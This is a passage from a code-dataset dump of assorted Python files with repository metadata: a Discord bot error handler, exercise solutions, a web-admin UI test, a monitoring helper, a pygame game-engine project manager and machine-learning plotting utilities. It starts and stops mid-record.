color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em7)\r\n elif isinstance(error, commands.MissingRequiredArgument):\r\n em8 = discord.Embed(\r\n title=\"Missing a Required Option\",\r\n description=\"The command you just used has an option which you HAVE to fill in (which you didn't). 
Please try again\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em8)\r\n elif isinstance(error, commands.BotMissingRole):\r\n em9 = discord.Embed(\r\n title=\"I'm Missing a Role\",\r\n description=\"As it seems, what you wanted me to do just know requires me to have a role which I don't have\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em9)\r\n elif isinstance(error, commands.MissingRole):\r\n em10 = discord.Embed(\r\n title=\"Missing a Role\",\r\n description=\"You require a certain role which you don't have.\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em10)\r\n elif isinstance(error, commands.RoleNotFound):\r\n em11 = discord.Embed(\r\n title=\"Role Not Found\",\r\n description=\"Oops, couldn't find the role specified!\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em11)\r\n elif isinstance(error, commands.UserNotFound):\r\n em12 = discord.Embed(\r\n title=\"User Not Found\",\r\n description=\"The user specified has not been found (check the spelling of the name)\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em12)\r\n elif isinstance(error, commands.TooManyArguments):\r\n em13 = discord.Embed(\r\n title=\"Too Many Options\",\r\n description=\"Take a chillpill, bruv! Don't give me so many options!\",\r\n color=discord.Colour.og_blurple(),\r\n timestamp=datetime.datetime.utcnow()\r\n )\r\n await ctx.send(embed=em13)\r\n else:\r\n print('Ignoring exception in command {}:'.format(ctx.command), file=sys.stderr)\r\n traceback.print_exception(type(error), error, error.__traceback__, file=sys.stderr)\r\n\r\n @commands.command(name='repeat', aliases=['mimic', 'copy'], hidden=True)\r\n async def do_repeat(self, ctx, *, inp: str):\r\n \"\"\"A simple command which repeats your input!\r\n Parameters\r\n ------------\r\n inp: str\r\n The input you wish to repeat.\r\n \"\"\"\r\n await ctx.send(inp)\r\n\r\n @do_repeat.error\r\n async def do_repeat_handler(self, ctx, error):\r\n \"\"\"A local Error Handler for our command do_repeat.\r\n This will only listen for errors in do_repeat.\r\n The global on_command_error will still be invoked after.\r\n \"\"\"\r\n\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n if error.param.name == 'inp':\r\n await ctx.send(\"You forgot to give me input to repeat!\")\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Errors(bot))\r\n","repo_name":"235baron/CatsyBot-Ultimatum","sub_path":"Cogs/cog_errorhandling.py","file_name":"cog_errorhandling.py","file_ext":"py","file_size_in_byte":7125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"2223348446","text":"from math import sqrt, ceil, gcd\n\n\ndef triplets_in_range(start, end):\n for limit in range(4, end + 1, 4):\n for x_pos, y_pos, z_pos in primitive_triplets(limit):\n alpha = x_pos\n beta = y_pos\n gamma = z_pos\n\n while alpha < start:\n alpha = alpha + x_pos\n beta = beta + y_pos\n gamma = gamma + z_pos\n\n while gamma <= end:\n yield [alpha, beta, gamma]\n\n alpha = alpha + x_pos\n beta = beta + y_pos\n gamma = gamma + z_pos\n\n\ndef euclidian_coprimes(limit):\n mean = limit // 2\n for idx in range(1, int(ceil(sqrt(mean)))):\n if mean % idx == 0:\n member = mean // idx\n if (member - idx) % 2 == 1 and gcd(member, 
idx) == 1:\n yield member, idx\n\n\ndef primitive_triplets(limit):\n \"\"\"See Euclid's formula\n (https://en.wikipedia.org/wiki/Pythagorean_triple#Generating_a_triple)\n for more information\n \"\"\"\n for member_1, member_2 in euclidian_coprimes(limit):\n calc_1 = member_1 ** 2\n calc_2 = member_2 ** 2\n\n alpha = calc_1 - calc_2\n beta = 2 * member_1 * member_2\n gamma = calc_1 + calc_2\n\n if alpha > beta:\n alpha, beta = beta, alpha\n\n yield alpha, beta, gamma\n\n\ndef triplets_with_sum(number):\n return [\n triplet for triplet\n in triplets_in_range(1, number // 2)\n if sum(triplet) == number\n ]\n","repo_name":"exercism/python","sub_path":"exercises/practice/pythagorean-triplet/.meta/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":1570,"dataset":"github-code","pt":"63"} +{"seq_id":"22502868545","text":"import random\nimport string\nimport time\n\nfrom test_framework.web_admin_core.pages.login.login_page import LoginPage\nfrom test_framework.web_admin_core.pages.markets.market_data_sources.main_page import \\\n MarketDataSourcesPage\nfrom test_framework.web_admin_core.pages.markets.market_data_sources.wizard import \\\n MarketDataSourcesWizard\nfrom test_framework.web_admin_core.pages.root.side_menu import SideMenu\nfrom test_framework.web_admin_core.utils.web_driver_container import WebDriverContainer\nfrom test_cases.web_admin.web_admin_test_cases.common_test_case import CommonTestCase\n\n\nclass QAP_T4012(CommonTestCase):\n def __init__(self, web_driver_container: WebDriverContainer, second_lvl_id, data_set=None, environment=None):\n super().__init__(web_driver_container, self.__class__.__name__, second_lvl_id, data_set=data_set,\n environment=environment)\n self.login = self.data_set.get_user(\"user_1\")\n self.password = self.data_set.get_password(\"password_1\")\n self.symbol = self.data_set.get_symbol_by_name(\"symbol_6\")\n self.user = self.data_set.get_user(\"user_12\")\n self.venue = self.data_set.get_venue_by_name(\"venue_1\")\n self.md_source = ''.join(random.sample((string.ascii_uppercase + string.digits) * 6, 6))\n self.md_source_edited = ''.join(random.sample((string.ascii_uppercase + string.digits) * 6, 6))\n\n def precondition(self):\n login_page = LoginPage(self.web_driver_container)\n login_page.login_to_web_admin(self.login, self.password)\n side_menu = SideMenu(self.web_driver_container)\n side_menu.open_market_data_source_page()\n main_page = MarketDataSourcesPage(self.web_driver_container)\n if not main_page.is_market_data_source_entity_displayed():\n main_page.click_on_new_button()\n wizard = MarketDataSourcesWizard(self.web_driver_container)\n wizard.set_symbol(self.symbol)\n wizard.set_user(self.user)\n wizard.set_venue(self.venue)\n wizard.set_md_source(self.md_source)\n wizard.click_on_save_changes()\n time.sleep(1)\n\n main_page.click_on_more_actions()\n main_page.click_on_edit_at_more_actions()\n\n def test_context(self):\n self.precondition()\n wizard = MarketDataSourcesWizard(self.web_driver_container)\n main_page = MarketDataSourcesPage(self.web_driver_container)\n headers = [\"Symbol\", \"User\", \"Venue\"]\n is_actual_fields_enabled = [wizard.is_symbol_field_enabled(), wizard.is_user_field_enabled(),\n wizard.is_venue_field_enabled()]\n expected_result = [False, False, False]\n self.verify_arrays_of_data_objects(\"Is fields enabled\", headers, expected_result, is_actual_fields_enabled)\n time.sleep(2)\n wizard.set_md_source(self.md_source_edited)\n 
time.sleep(2)\n        wizard.click_on_save_changes()\n        time.sleep(2)\n        main_page.set_md_source_at_filter(self.md_source_edited)\n        time.sleep(2)\n        self.verify(\"After saving \", self.md_source_edited, main_page.get_md_source())\n","repo_name":"YevhenMoroz/th2-script-quod-demo","sub_path":"test_cases/web_admin/web_admin_test_cases/markets/QAP_T4012.py","file_name":"QAP_T4012.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"45218901568","text":"class TargetTimeSeries(dict):\n\n    def __init__(self, *arg, **kwargs):\n        super(TargetTimeSeries, self).__init__(*arg, **kwargs)\n        self.other_targets_names = {}\n\n    def get_expression_values(self, t1, timestamp):\n        expression_values = {}\n        for target_number in xrange(1, len(self) + 1):\n            target_name = \"t%s\" % target_number\n            tN = self[target_number][0] if target_number > 1 else t1\n            value_index = (timestamp - tN.start) / tN.step\n            tN_value = tN[value_index] if len(tN) > value_index else None\n            expression_values[target_name] = tN_value\n            if tN_value is None:\n                break\n        return expression_values\n\n    def set_state_value(self, metric_state, expression_values, tN):\n        if expression_values is None:\n            if \"value\" in metric_state:\n                del metric_state[\"value\"]\n        else:\n            metric_state[\"value\"] = expression_values[tN]\n\n    def update_state(self, t1, check, expression_state, expression_values, timestamp):\n        metric_state = check[\"metrics\"][t1.name]\n        metric_state[\"state\"] = expression_state\n        metric_state[\"timestamp\"] = timestamp\n        self.set_state_value(metric_state, expression_values, \"t1\")\n\n        for tN, tName in self.other_targets_names.iteritems():\n            other_metric_state = check[\"metrics\"][tName]\n            other_metric_state[\"state\"] = expression_state\n            other_metric_state[\"timestamp\"] = timestamp\n            self.set_state_value(other_metric_state, expression_values, tN)\n","repo_name":"moira-alert/worker","sub_path":"moira/checker/timeseries.py","file_name":"timeseries.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"63"}
{"seq_id":"27935479488","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/5/11 18:13\n# @Author : XXX\n# @title : Mirror of a binary tree\n# @Site : \n# @File : 二叉树的镜像.py\n# @Software: PyCharm\n\n\nclass Solution:\n    # return the root of the mirrored tree\n    def Mirror(self, root):\n        if root is not None:\n            root.left, root.right = root.right, root.left\n            self.Mirror(root.left)\n            self.Mirror(root.right)\n        else:\n            return None\n\n","repo_name":"KIM199511/-offer","sub_path":"code/二叉树的镜像.py","file_name":"二叉树的镜像.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"23593507447","text":"# This is the Project manager; it is made to create and manage your game project\r\n# Copyright (C) 2023 Marius Angermann\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n\r\n\r\nimport pygame\r\nimport sys\r\nimport os\r\nimport shutil\r\nimport subprocess\r\n\r\nfrom ui_modules.ui_input import Input\r\nfrom ui_modules.ui_button import Button\r\nfrom ui_modules.ui_askbox import AskBox\r\n\r\n\r\n\r\n\r\n\r\n\r\npygame.init()\r\n\r\nflag = pygame.NOFRAME\r\n\r\nicon = pygame.image.load(\"src/icon.png\")\r\n\r\npygame.display.set_icon(icon)\r\n\r\nscreen = pygame.display.set_mode((1000,700),flag)\r\n\r\nclock = pygame.time.Clock()\r\n\r\n\r\nrendered_projects = []\r\nprojects_initialized = []\r\nlast_pos = [0,0]\r\n\r\nclass rendered_project:\r\n\tdefault_font = pygame.font.SysFont(None,35)\r\n\tedit_font = pygame.font.SysFont(\"Agency FB\",20)\r\n\trender_costumes = [\r\n\t\tpygame.image.load(\"src/colored_shapes/project_render.png\"),\r\n\t\tpygame.image.load(\"src/colored_shapes/project_render_select.png\")\r\n\t]\r\n\tdelete_costumes = [\r\n\t\tpygame.image.load(\"src/icons/delete.png\"),\r\n\t\tpygame.image.load(\"src/icons/delete_hover.png\")\r\n\t]\r\n\tdef __init__(self,project_name=\"default-project\",last_opened_str=\"never\",last_position=[0,0]):\r\n\t\tself.name = project_name\r\n\t\tself.last_edit = last_opened_str\r\n\t\tself.title = self.default_font.render(self.name,True,(255,255,255))\r\n\t\tself.edit_label = self.edit_font.render(\"LAST EDITED: \" + self.last_edit,True,(255,255,255))\r\n\t\tself.selected = False\r\n\t\tself.delete_hovered = False\r\n\r\n\t\tif last_position == [0,0]:\r\n\t\t\tself.position = [10,200]\r\n\t\telse:\r\n\t\t\tself.position = [10,last_position[1]+200]\r\n\r\n\t\tself.del_pos = [self.position[0]+495,self.position[1]+55]\r\n\t\tself.open_button = Button(\"Open\",pygame.font.SysFont(None,30),200,60,(self.position[0]+285,self.position[1]+60),(11, 37, 59),(5, 16, 26),(35, 57, 77),12)\r\n\tdef render(self,display_surface):\r\n\t\t\r\n\t\tif self.selected == False:\r\n\t\t\tcostume = self.render_costumes[0]\r\n\t\telse:\r\n\t\t\tcostume = self.render_costumes[1]\r\n\r\n\t\tif self.delete_hovered == True:\r\n\t\t\tdelete_costume = self.delete_costumes[1]\r\n\t\telse:\r\n\t\t\tdelete_costume = self.delete_costumes[0]\r\n\r\n\t\tdelete_costume = pygame.transform.scale(delete_costume, (60,60))\r\n\r\n\t\ttest_hover = self.delete_costumes[0]\r\n\t\ttest_hover = pygame.transform.scale(test_hover, (60,60))\r\n\t\ttest_col = test_hover.get_rect()\r\n\t\ttest_col = test_col.move(self.del_pos)\r\n\r\n\t\tif test_col.collidepoint(pygame.mouse.get_pos()):\r\n\t\t\tself.delete_hovered = True\r\n\t\telse:\r\n\t\t\tself.delete_hovered = False\r\n\r\n\t\tif self.open_button.check_click():\r\n\t\t\topentemp = open(\"prcopen.info\", \"w\")\r\n\t\t\topentemp.writelines(self.name)\r\n\t\t\topentemp.close()\r\n\t\t\tscript_dir = os.path.dirname(os.path.realpath(__file__))\r\n\t\t\tsubprocess.Popen('cmd /c cd /d \"{}\" &'.format(script_dir), shell=True)\r\n\t\t\tsubprocess.Popen('python Editor.py', shell=True)\r\n\t\t\tpygame.quit()\r\n\t\t\tsys.exit()\r\n\r\n\t\tcostume_scaled = pygame.transform.scale(costume, (600,170))\r\n\t\tdisplay_surface.blit(costume_scaled, self.position)\r\n\t\tdisplay_surface.blit(self.title, (50,self.position[1]+30))\r\n\t\tdisplay_surface.blit(self.edit_label, (50,self.position[1]+80))\r\n\t\tself.open_button.draw(display_surface)\r\n\t\tdisplay_surface.blit(delete_costume, (self.del_pos[0],self.del_pos[1]))\r\n\tdef move_button(self, 
newvector=[0,0]):\r\n\t\tself.open_button.move(newvector)\r\n\r\n\r\n\r\n\r\n\r\ndef add_prc_to_render(last_pos):\r\n\tfor prcs in projects_initialized:\r\n\t\topenfile = open('projects/'+prcs+'/project.artix', 'r')\r\n\t\treadfile = openfile.readlines()\r\n\t\trendered_projects.append(rendered_project(prcs,str(readfile[0]),last_pos))\r\n\t\tlast_pos = [10,last_pos[1]+200]\r\n\t\topenfile.close()\r\n\r\nheadbar = pygame.image.load(\"src/colored_shapes/headbar.png\")\r\nheadbar_render = pygame.transform.scale(headbar, (1000,50))\r\n\r\ntitle_font = pygame.font.SysFont(None,30)\r\nwindow_title = title_font.render(\"Artix Project Manager\",True,(255,255,255))\r\n\r\ndef initialize_projects():\r\n\topened = open('registered_projects.info', 'r')\r\n\tread = opened.readlines()\r\n\tfor lines in read:\r\n\t\t# rstrip() to get rid of new line character\r\n\t\tline = lines.rstrip()\r\n\t\tif line != \"\":\r\n\t\t\tprojects_initialized.append(line)\r\n\tprint(projects_initialized)\r\n\topened.close()\r\n\r\n\r\ndef render_projects():\r\n\tfor elements in rendered_projects:\r\n\t\telements.render(screen)\r\n\t\r\n\t\r\ndef scroll_projects(status=\"down\"):\r\n\tcurrentindex = 0\r\n\tif status == \"down\":\r\n\t\tfor singleprcs in rendered_projects:\r\n\t\t\tsingleprcs.position = [singleprcs.position[0],singleprcs.position[1]-30]\r\n\t\t\tsingleprcs.del_pos = [singleprcs.del_pos[0],singleprcs.del_pos[1]-30]\r\n\t\t\tsingleprcs.move_button([0,-30])\r\n\telif status == \"up\":\r\n\t\tfor singleprcs in rendered_projects:\r\n\t\t\tsingleprcs.position = [singleprcs.position[0],singleprcs.position[1]+30]\r\n\t\t\tsingleprcs.del_pos = [singleprcs.del_pos[0],singleprcs.del_pos[1]+30]\r\n\t\t\tsingleprcs.move_button([0,30])\r\n\r\ndef del_prc(prc_name=\"\"):\r\n\twith open('registered_projects.info', 'r') as file:\r\n\t\tfile_contents = file.readlines()\r\n\t\tfile_contents = [line for line in file_contents if prc_name not in line]\r\n\twith open('registered_projects.info', 'w') as file:\r\n\t\tfile.writelines(file_contents)\r\n\tfolder_path = \"./projects/\" + prc_name\r\n\tshutil.rmtree(folder_path)\r\n\r\n\r\n\t\r\n\t\r\n\t\r\n\t\r\n\r\n\r\n\r\n\r\nexit_button_costumes = [\r\n\tpygame.image.load(\"src/icons/exit.png\"),\r\n\tpygame.image.load(\"src/icons/exit_hover.png\")\r\n]\r\n\r\nexit_button = exit_button_costumes[0]\r\nexit_button_render = pygame.transform.scale(exit_button, (40,40))\r\nexit_button_colshape = exit_button_render.get_rect()\r\nexit_button_colshape.x = 945\r\nexit_button_colshape.y = 5\r\n\r\n\r\nfont_1 = pygame.font.SysFont(\"OCR-A Extended\",40)\r\nrecent_projects_label = font_1.render(\"Recent Projects:\",True,(255,255,255))\r\nnew_project_button = Button(\"Create Project\",pygame.font.SysFont(None,30),200,40,(30,70),(92, 91, 91),(56, 56, 56),(143, 141, 141),12)\r\n\r\n\r\nrenderit = False\r\nfinal = \"\"\r\ncreate = False\r\nnew_project_box = AskBox(\"Enter Project Name\",\"New Project\",(1000,700))\r\n\r\nfade_rect = pygame.Rect(0,0,1000,200)\r\n\r\ninitialize_projects()\r\nadd_prc_to_render(last_pos)\r\n\r\nwhile True:\r\n\tif exit_button_colshape.collidepoint(pygame.mouse.get_pos()):\r\n\t\texit_button = exit_button_costumes[1]\r\n\t\texit_button_render = pygame.transform.scale(exit_button, (40,40))\r\n\telse:\r\n\t\texit_button = exit_button_costumes[0]\r\n\t\texit_button_render = pygame.transform.scale(exit_button, (40,40))\r\n\r\n\r\n\tfor event in pygame.event.get():\r\n\t\tnew_project_box.input_box.get_input(event)\r\n\r\n\t\tif event.type == 
pygame.QUIT:\r\n\t\t\tprint(\"\")\r\n\t\t\tprint(\"\")\r\n\t\t\tprint(\"press enter to quit >\")\r\n\t\t\tpygame.quit()\r\n\t\t\tsys.exit()\r\n\t\tif event.type == pygame.MOUSEBUTTONDOWN:\r\n\t\t\tif exit_button_colshape.collidepoint(event.pos):\r\n\t\t\t\tprint(\"\")\r\n\t\t\t\tprint(\"\")\r\n\t\t\t\tprint(\"\")\r\n\t\t\t\tprint(\"Press enter to quit>\")\r\n\t\t\t\tpygame.quit()\r\n\t\t\t\tsys.exit()\r\n\r\n\t\tif event.type == pygame.MOUSEBUTTONDOWN:\r\n\t\t\tif event.button == 1:\r\n\t\t\t\tfor renderedobjects in rendered_projects:\r\n\t\t\t\t\tif renderedobjects.delete_hovered == True:\r\n\t\t\t\t\t\tdel_prc(renderedobjects.name)\r\n\t\t\t\t\t\trendered_projects = []\r\n\t\t\t\t\t\tprojects_initialized = []\r\n\t\t\t\t\t\tinitialize_projects()\r\n\t\t\t\t\t\tprint(projects_initialized)\r\n\t\t\t\t\t\tadd_prc_to_render(last_pos)\r\n\t\t\tif event.button == 4: # Scroll up\r\n\t\t\t\tif rendered_projects and rendered_projects[0].position[1] <= 230:\r\n\t\t\t\t\tscroll_projects(\"up\")\r\n\t\t\telif event.button == 5: # Scroll down\r\n\t\t\t\tif rendered_projects and rendered_projects[len(rendered_projects)-1].position[1] >= 500:\r\n\t\t\t\t\tscroll_projects(\"down\")\r\n\r\n\t#logic\r\n\tif new_project_button.check_click() == True:\r\n\t\trenderit = True\r\n\r\n\r\n\t#rendering\r\n\tscreen.fill((46, 44, 44))\r\n\r\n\trender_projects()\r\n\tpygame.draw.rect(screen,(46, 44, 44),fade_rect)\r\n\tscreen.blit(headbar_render, (0,0))\r\n\tscreen.blit(window_title, (370,15))\r\n\tscreen.blit(exit_button_render, (945,5))\r\n\r\n\r\n\tscreen.blit(recent_projects_label,(35,135))\r\n\tnew_project_button.draw(screen)\r\n\t\r\n\r\n\tif renderit == True:\r\n\t\tvalue = new_project_box.get_active()\r\n\t\tif value == True:\r\n\t\t\trenderit = False\r\n\t\t\tcreate = True\r\n\t\telse:\r\n\t\t\trenderit = True\r\n\t\r\n\r\n\tif create == True:\r\n\t\tcreate = False\r\n\t\trenderit = False\r\n\t\tregistered_projects_temp = []\r\n\t\tfileopen = open('registered_projects.info','r')\r\n\t\tfileread = fileopen.readlines()\r\n\t\tfor lines in fileread:\r\n\t\t\tregistered_projects_temp.append(lines.rstrip(\"\\n\"))\r\n\t\tfileopen.close()\r\n\t\tfinal = new_project_box.get_value()\r\n\t\tif final != \"\" and final not in registered_projects_temp:\r\n\t\t\trenderit = True\r\n\t\t\tfileopen_privat = open('registered_projects.info','w')\r\n\t\t\tfileopen_privat.writelines(final+'\\n')\r\n\r\n\t\t\tcurrent_dir = os.getcwd()\r\n\t\t\tprojects_path = os.path.join(current_dir, \"projects\")\r\n\t\t\tnew_folder_path = os.path.join(projects_path, final)\r\n\t\t\tos.mkdir(new_folder_path)\r\n\t\t\tfile_path = os.path.join(new_folder_path, \"project.artix\")\r\n\t\t\twith open(file_path, 'w') as f:\r\n\t\t\t\tf.write('never')\r\n\r\n\t\t\tfile_path = os.path.join(new_folder_path, \"files.txt\")\r\n\t\t\twith open(file_path, 'w') as f:\r\n\t\t\t\tf.write('')\r\n\r\n\t\t\tfile_path = os.path.join(new_folder_path, \"scenes.txt\")\r\n\t\t\twith open(file_path, 'w') as f:\r\n\t\t\t\tf.write('DefaultScene')\r\n\r\n\t\t\tfile_path = os.path.join(new_folder_path, \"Files\")\r\n\t\t\tos.mkdir(file_path)\r\n\r\n\t\t\tfile_path = os.path.join(new_folder_path, \"Scenes\")\r\n\t\t\tos.mkdir(file_path)\r\n\t\t\tactualfile = os.path.join(file_path, \"DefaultScene.txt\")\r\n\t\t\twith open(actualfile, 'w') as f:\r\n\t\t\t\tf.write('')\r\n\r\n\t\t\tfolder = os.path.join(file_path, \"DefaultScene\")\r\n\t\t\tos.mkdir(folder)\r\n\t\t\tactualfile = os.path.join(folder, \"Camera2D.config\")\r\n\t\t\tcameraconfig = [\"#TRANSFORM\",\"0\",\"0\",\"#BGCOLOR\",\"#ffffff\"]\r\n\t\t\twith 
open(actualfile, 'w') as f:\r\n\t\t\t\tfor strings in cameraconfig:\r\n\t\t\t\t\tf.write(strings+\"\\n\")\r\n\r\n\t\t\tfor elements in registered_projects_temp:\r\n\t\t\t\tfileopen_privat.writelines(elements+'\\n')\r\n\t\t\tfileopen_privat.close()\r\n\t\t\tfinal = \"\"\r\n\t\t\trendered_projects = []\r\n\t\t\tprojects_initialized = []\r\n\t\t\tinitialize_projects()\r\n\t\t\tprint(projects_initialized)\r\n\t\t\tadd_prc_to_render(last_pos)\r\n\t\r\n\tif renderit == True:\r\n\t\tnew_project_box.render(screen,(1000,700))\r\n\tpygame.display.update()\r\n\tclock.tick(60)\r\n\r\n\tif pygame.display.get_active() == False:\r\n\t\tpygame.quit()\r\n\t\tsys.exit()\r\n\r\nprint(\"\")","repo_name":"MariusAngermann08/Artix-Engine","sub_path":"project_manager.py","file_name":"project_manager.py","file_ext":"py","file_size_in_byte":10755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"}
{"seq_id":"35014306031","text":"\"\"\"\nThis file contains definitions of various helper functions and utilities used during our experimentation.\n\nAuthor: Dominik Chodounský\nInstitution: Faculty of Information Technology, Czech Technical University in Prague\nLast edit: 2021-05-12\n\"\"\"\n\n\nimport cv2\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport tensorflow.keras.backend as K\nfrom sklearn.metrics import confusion_matrix, roc_auc_score, roc_curve\nimport random\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport os\nimport shutil\n\n\ndef show_sample_grid(path, grid_size=6):\n    \"\"\"\n    Prints a grid with an equal representation of randomly selected images from the 'negative' class and the 'positive' class.\n    \n    Parameters\n    ----------\n    path : str\n        Path to folder containing the data. This folder should contain one subfolder per class (negative and positive) with the image data within them.\n    grid_size : int\n        Size of the side of the grid, the resulting number of images displayed will be grid_size * grid_size. 
Default value: 6.\n \"\"\"\n \n if grid_size % 2 != 0:\n raise ValueError(f'The grid size must be divisible by 2, so that both classes can be represented equally')\n\n negative = random.sample(os.listdir(os.path.join(path, 'negative')), int(grid_size**2 / 2))\n positive = random.sample(os.listdir(os.path.join(path, 'positive')), int(grid_size**2 / 2))\n\n negative_imgs = [cv2.imread(os.path.join(path, 'negative', i)) for i in negative]\n positive_imgs = [cv2.imread(os.path.join(path, 'positive', i)) for i in positive]\n\n plt.figure(figsize=(12,12))\n i, j = 0, 0\n for cnt in range(grid_size**2):\n ax = plt.subplot(grid_size, grid_size, cnt + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n if cnt % 2 == 0:\n plt.imshow(negative_imgs[i], cmap='bone')\n if grid_size < 13:\n ax.set_xlabel('negative', labelpad=0.1)\n i += 1\n else:\n plt.imshow(positive_imgs[j], cmap='bone')\n if grid_size < 13:\n ax.set_xlabel('positive',labelpad=0.1)\n j += 1\n plt.show()\n #plt.savefig(os.path.abspath(os.path.join('/content/drive/MyDrive/ColabNotebooks/BI-BAP', 'diagrams/covidx8_sample.pdf')), bbox_inches='tight', format='pdf')\n \n\ndef plot_eval(y_true, y_pred_prob, y_pred):\n \"\"\"\n Prints a confusion matrix and an ROC curve with a calculated AUC metric for given classification results.\n \n Parameters\n ----------\n y_true : NumPy.ndarray\n Ground truth labels of the evaluated samples.\n y_pred_prob : NumPy.ndarray\n Predicted probabilities of the evaluated samples belonging to the positive class.\n y_pred : NumPy.ndarray\n Predicted class of the evaluated samples.\n \"\"\"\n \n # set font style to match with written part of the thesis\n plt.rcParams['font.family'] = 'serif'\n plt.rcParams['font.serif'] = ['Times New Roman'] + plt.rcParams['font.serif']\n\n # construct a confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n ax = sns.heatmap(cm, annot=True, cmap='Blues', fmt='d', xticklabels=['negative', 'positive'], yticklabels=['negative', 'positive'], vmin=0, vmax=np.count_nonzero(y_true == 0), annot_kws={'size': 15})\n\n ax.set_yticklabels(labels=ax.get_yticklabels(), va='center')\n plt.tick_params(axis='both', which='major', labelsize=13)\n plt.xlabel('Predicted labels', fontsize = 14, labelpad=12)\n plt.ylabel('True labels', fontsize = 14, labelpad=12)\n cbar = ax.collections[0].colorbar\n cbar.ax.tick_params(labelsize=12)\n\n plt.show()\n\n # calculate ROC rurve and its AUC metric\n fpr_keras, tpr_keras, thresholds_keras = roc_curve(y_true, y_pred_prob)\n auc = roc_auc_score(y_true, y_pred_prob)\n\n plt.figure(1)\n plt.plot([0, 1], [0, 1], 'k--', linewidth=2, color='darkblue')\n plt.plot(fpr_keras, tpr_keras, label='ROC (AUC = {:.3f})'.format(auc), linewidth=2, color='darkorange')\n\n plt.tick_params(axis='both', which='major', labelsize=13)\n plt.xlabel('False positive rate', fontsize=14, labelpad=12)\n plt.ylabel('True positive rate', fontsize=14, labelpad=8)\n plt.title('Receiver Operating Characteristic Curve', fontsize=15)\n plt.legend(loc='lower right', fontsize=15)\n plt.xlim(-0.01,1)\n plt.ylim(0,1.01)\n\n plt.show()\n\n \n \ndef get_generators(datagen, train_dir, test_dir, img_size=224, batch_size=32, channel_cnt=3, shuffle=True, rand_seed=111):\n \"\"\"\n Creates data sources from a given image data generator, which are then used in training and evaluating a model.\n \n Parameters\n ----------\n datagen : TensorFlow.keras.preprocessing.image.ImageDataGenerator\n Image data generator based on which the sources will be created.\n train_dir : str\n Path to folder containing 
training images.\n test_dir : str\n Path to folder containing testing images.\n img_size : int\n Target size of the images. Default value: 224.\n batch_size : int\n Batch size, which will be yielded by the generators in each call. Default value: 32.\n channel_cnt : int\n Number of channels in the input images. The count determines whether rgb or grayscale mode will be used. Default value: 3.\n shuffle : bool\n Wheteher to shuffle the order of the images when generating them. Default value: True.\n rand_seed : int\n Random seed for the shuffling. Default value: 111.\n \n Returns\n -------\n train_gen, valid_gen, test_gen : TensorFlow.keras.preprocessing.image.DirectoryIterator\n Iterators, which yield tuples of (x, y) where x is a NumPy array containing a batch of images and y is a NumPy array of their corresponding labels.\n \"\"\"\n if channel_cnt == 3:\n mode = 'rgb'\n elif channel_cnt == 1:\n mode = 'grayscale'\n else:\n raise ValueError(f'The target number of channels in the images must be either 1 (grayscale) or 3 (rgb)')\n \n train_gen = datagen.flow_from_directory(\n directory=train_dir,\n target_size=(img_size, img_size),\n batch_size=batch_size,\n class_mode='binary',\n subset='training',\n color_mode=mode,\n shuffle=shuffle,\n seed=rand_seed\n )\n\n valid_gen = datagen.flow_from_directory(\n directory=train_dir,\n target_size=(img_size, img_size),\n batch_size=batch_size,\n class_mode='binary',\n subset='validation',\n color_mode=mode,\n shuffle=shuffle,\n seed=rand_seed\n )\n \n # copy original datagen's preprocessing function, but discard augmentation settings\n datagen_test = ImageDataGenerator(preprocessing_function=datagen.preprocessing_function)\n test_gen = datagen_test.flow_from_directory(\n directory=test_dir,\n target_size=(img_size, img_size),\n batch_size=batch_size,\n class_mode='binary',\n color_mode=mode,\n shuffle=False,\n seed=rand_seed\n )\n \n return train_gen, valid_gen, test_gen\n\n\ndef get_class_weights(train_dir, class_cnt=2):\n \"\"\"\n Calculates weights for the two classes based on their representation in the training data.\n The more observed class will be assigned a proportionally lower weight.\n \n Parameters\n ----------\n train_dir : str\n Path to the folder with training data. This folder should include two subfolders, one for each class (negative, positive).\n \n Returns\n -------\n class_weights : dict\n Dictionary where there is a key for both of the classes and the key's value is the weight for the given class in training.\n Negative class has key '0' and positive class key '1'.\n \"\"\"\n \n negative_cnt = len(os.listdir(os.path.join(train_dir, 'negative')))\n positive_cnt = len(os.listdir(os.path.join(train_dir, 'positive')))\n total = negative_cnt + positive_cnt\n\n class_weights = {\n 0: total / (negative_cnt * 